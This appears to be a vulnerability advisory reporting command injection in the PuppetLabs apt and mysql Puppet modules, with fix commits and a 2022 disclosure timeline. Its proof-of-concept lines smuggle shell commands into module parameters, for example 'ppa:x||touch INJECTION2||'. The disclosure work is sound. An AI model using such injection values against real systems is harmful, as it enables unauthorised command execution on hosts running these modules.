Summary

Running interpreted shell commands without sanitation allows command line injection in multiple PuppetLabs modules via module arguments.

Severity

High - Insufficient data validation allows command injection in multiple modules.

Proof of Concepts

puppetlabs-apt/manifests/ppa.pp:86

command => "/usr/bin/add-apt-repository ${options} ${name} || (rm ${::apt::sources_list_d}/${sources_list_d_filename} && false)",

PoC injection via the name variable:

include apt
apt::ppa { 'ppa:x||touch INJECTION2||': }

The issue was reproduced by putting the PoC into test.pp and running puppet apply --debug test.pp and verifying that a file called INJECTION2 was created.

PoC injection via the options variable:

include apt
apt::ppa { 'ppa:x': options => '||touch INJECTION||' }

puppetlabs-apt/manifests/mark.pp

PoC: apt::mark { 'x;touch INJECTION3': setting => auto }

puppetlabs-mysql/manifests/db.pp:103

• Code: command => "${import_cat_cmd} ${sql_inputs} | mysql ${dbname}"
• Affected parameters: $sql, $dbname (defaults to $name) -- note: also import_cat_cmd but that is probably intended

puppetlabs-mysql/manifests/server/config.pp

mysql::server::options["mysqld"]["tmpdir"] = "||touch INJECTION||" (not verified)

puppetlabs-mysql/manifests/server/root_password.pp:32

mysql::server::install_secret_file

puppetlabs-mysql/manifests/server/service.pp:57

mysql::server::options["mysqld"]["socket"]

Further Analysis

Remediation Guidelines:
#1 puppetlabs/puppetlabs-apt@c26ad2a - Aug 18
#2 puppetlabs/puppetlabs-apt@eed10ea - Aug 12
#3 puppetlabs/puppetlabs-mysql@547483f - Aug 22
#4 puppetlabs/puppetlabs-mysql@1c1291d - Aug 22
#5 puppetlabs/puppetlabs-mysql@90168d9 - Aug 23
#6 puppetlabs/puppetlabs-mysql@cdaa839 - Aug 19

Timeline

Date reported: 08/08/2022
Date fixed: 08/23/2022
Date disclosed: 10/06/2022